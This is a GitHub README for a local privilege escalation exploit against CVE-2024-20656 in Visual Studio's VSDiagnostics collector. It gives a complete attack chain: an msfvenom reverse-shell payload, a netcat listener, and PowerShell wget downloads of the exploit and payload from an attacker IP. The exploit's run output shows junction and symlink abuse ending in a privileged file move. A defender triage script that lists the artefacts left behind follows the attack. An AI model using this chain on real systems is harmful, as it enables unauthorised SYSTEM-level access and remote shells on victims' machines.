charlesgargasson/CVE-2024-20656

CVE-2024-20656 LPE

Exploit

⚠️ If you are using WinRM, please consider moving to a logon session with RunasCs (https://github.com/antonioCoco/RunasCs).


On the attacking host (payload generation, web-served download and listener):

```bash
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.113 LPORT=443 EXITFUNC=thread -f exe -a x86 --platform windows -o payload.exe
sudo cp payload.exe /var/www/html
sudo nc -nvlp 443 -s 10.10.14.113
```

On the target host (PowerShell session, including the exploit's output):

```powershell
PS C:\Windows\system32> mkdir c:\exploit
PS C:\Windows\system32> wget 10.10.14.113/Expl.exe -O c:\exploit\Expl.exe
PS C:\Windows\system32> wget 10.10.14.113/payload.exe -O c:\exploit\payload.exe
PS C:\Windows\system32> $VSDiagnostics = get-item "C:\\*\\Microsoft Visual Studio\\*\\Community\\Team Tools\\DiagnosticsHub\\Collector\\VSDiagnostics.exe" | select -last 1
PS C:\Windows\system32> c:\exploit\Expl.exe $VSDiagnostics.FullName "c:\exploit\payload.exe"
[+] VSDiagnostics: C:\Program Files (x86)\Microsoft Visual Studio\2019\Community\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe
[+] Payload: c:\exploit\payload.exe
[+] Junction \\?\C:\eb5f22a2-318b-4ba5-b98c-213240bc8284 -> \??\C:\a11c80fd-8951-4add-b93c-6d312af3bd4a created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0197E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata created!
[+] Junction \\?\C:\eb5f22a2-318b-4ba5-b98c-213240bc8284 -> \RPC Control created!
[+] Junction \\?\C:\eb5f22a2-318b-4ba5-b98c-213240bc8284 -> \??\C:\a11c80fd-8951-4add-b93c-6d312af3bd4a created!
[+] Symlink Global\GLOBALROOT\RPC Control\Report.0297E42F-003D-4F91-A845-6404CF289E84.diagsession -> \??\C:\Programdata\Microsoft created!
[+] Junction \\?\C:\eb5f22a2-318b-4ba5-b98c-213240bc8284 -> \RPC Control created!
[+] Persmissions successfully reseted!
[*] Starting WMI installer.
[*] Command to execute: C:\windows\system32\msiexec.exe /fa C:\windows\installer\8ad86.msi
[*] Oplock!
[+] File moved!
PS C:\Windows\system32>
```
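Added defender-side triage script, not part of this repository: it surfaces the on-disk artefacts the run above leaves behind (GUID-named reparse points at the root of C:\, the VSDiagnostics.exe collector located with the README's own glob, and explicit broad-principal ACEs on the two symlink targets, C:\ProgramData and C:\ProgramData\Microsoft). Widening `Community` to `*` for other Visual Studio editions and the Windows PowerShell 5.1+ requirement are assumptions.

```powershell
# Added triage script (not the repository's code). Lists GUID-named reparse
# points under C:\, VSDiagnostics.exe copies, and loose ACEs on the symlink
# targets seen in the exploit output. Assumes Windows PowerShell 5.1 or later.

$GuidName = '^[0-9a-f]{8}-([0-9a-f]{4}-){3}[0-9a-f]{12}$'

function Get-RootGuidReparsePoint {
    param([string]$Root = 'C:\')
    # Junctions are directories carrying the ReparsePoint attribute.
    Get-ChildItem -Path $Root -Directory -Force -ErrorAction SilentlyContinue |
        Where-Object { $_.Attributes.HasFlag([IO.FileAttributes]::ReparsePoint) -and $_.Name -match $GuidName } |
        ForEach-Object {
            [pscustomobject]@{
                Path     = $_.FullName
                LinkType = $_.LinkType
                Target   = (@($_.Target) -join ';')   # string in PS 7, array in 5.1
                Created  = $_.CreationTime
            }
        }
}

function Get-VSDiagnosticsCollector {
    # Same search the README uses, widened from 'Community' to every edition
    # (assumption: other editions share the DiagnosticsHub\Collector layout).
    Get-Item 'C:\*\Microsoft Visual Studio\*\*\Team Tools\DiagnosticsHub\Collector\VSDiagnostics.exe' -ErrorAction SilentlyContinue |
        ForEach-Object {
            [pscustomobject]@{
                Path        = $_.FullName
                FileVersion = $_.VersionInfo.FileVersion
                Modified    = $_.LastWriteTime
            }
        }
}

function Get-LooseAce {
    # The two symlink targets from the exploit output. Report explicit Allow
    # entries giving broad principals Modify/FullControl; compare with a known-good host.
    param([string[]]$Path = @('C:\ProgramData', 'C:\ProgramData\Microsoft'))
    foreach ($p in $Path) {
        (Get-Acl -Path $p).Access |
            Where-Object { -not $_.IsInherited -and $_.AccessControlType -eq 'Allow' -and
                           $_.IdentityReference -match 'Users|Everyone|Authenticated Users' -and
                           $_.FileSystemRights -match 'FullControl|Modify' } |
            Select-Object @{n='Path';e={$p}}, IdentityReference, FileSystemRights
    }
}

Get-RootGuidReparsePoint | Format-Table -AutoSize
Get-VSDiagnosticsCollector | Format-Table -AutoSize
Get-LooseAce | Format-Table -AutoSize
```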

Languages

  • C++ 100.0%